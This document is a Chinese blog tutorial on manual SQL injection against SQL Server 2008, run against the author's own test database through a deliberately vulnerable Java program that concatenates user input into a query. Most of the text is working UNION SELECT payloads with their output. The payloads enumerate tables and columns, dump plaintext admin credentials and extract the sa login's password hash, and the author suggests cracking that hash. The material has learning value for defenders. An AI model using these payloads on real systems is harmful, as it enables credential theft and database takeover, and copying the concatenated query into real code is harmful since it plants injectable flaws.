sqlServer2008 手工注入

接着上一篇的《mysql手工注入》

参考：http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed

http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4

必备知识：

MSSQL注释符号： //  或 – --

也就是说上面两个符号后面的内容会被忽略

环境：

代码还是之前的代码

public class TestSql {

    public static void main(String[] args) throws InstantiationException,
            IllegalAccessException, ClassNotFoundException, SQLException {

        DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx","school");

        String name = "mynona";
        String address="gdut";

        name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";

        String sql  ="select * from student where name = '" + name + "' and address = '" + address +"'";

        //sql = "select name,  password_hash from sys.sql_logins";
        System.out.println("执行sql：");
        System.out.println(sql);
        System.out.println("输出结果：");
        System.out.println(de.getDateList(sql));

    }
}

　　

数据库：

目标：

我们看一下视图，发现和mysql很像

可以看到有INFORMATION.SCHEMA.TABLES和INFORMATION.SCHEMA.COLUMNS表

我们完全可以利用mysql手工注入的方法

在上面的视图里面，再往下：

我们的目标就是上面那个表的name和password

查看当前select字段数

name = "mynona' order by 1--";  ok
name = "mynona' order by 2--";  ok
name = "mynona' order by 3--";  ok
name = "mynona' order by 4--";  error

可以得出当前select 语句字段数是3

暴数据库名：

name = "mynona' and 1=2 union select 1,db_name(),3--";

执行sql：

select * from student where name = 'mynona' and 1=2 union select 1,db_name(),3--' and address = 'gdut'

输出结果：

[{id=1, address=3, name=school}]

可是数据库名为school

遍历当前数据库的表

name = "mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";

执行sql：

select * from student where name = 'mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--' and address = 'gdut'

输出结果：

[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]

可知表为：admin, school , sysdiagrams

遍历指定admin的字段

name = "mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--";

执行sql：

select * from student where name = 'mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--' and address = 'gdut'

输出结果：

[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]

可知表admin的字段为：id, name, password

遍历admin表数据：

name = "mynona' union select id, name, password from admin--";

执行sql：

select * from student where name = 'mynona' union select id, name, password from admin--' and address = 'gdut'

输出结果：

[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]

即：id=1, address=mynona, name=admin

遍历sys.sql_logins表

name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";

执行sql：

select * from student where name = 'mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--' and address = 'gdut'

输出结果：

[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]

可以得到：用户sa的password_hash 为0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a

拿这个hash值破解就可以得到sa的密码了

这篇和上一篇的源文件和测试项目下载地址：

http://download.csdn.net/detail/mmyzlinyingjie/7095041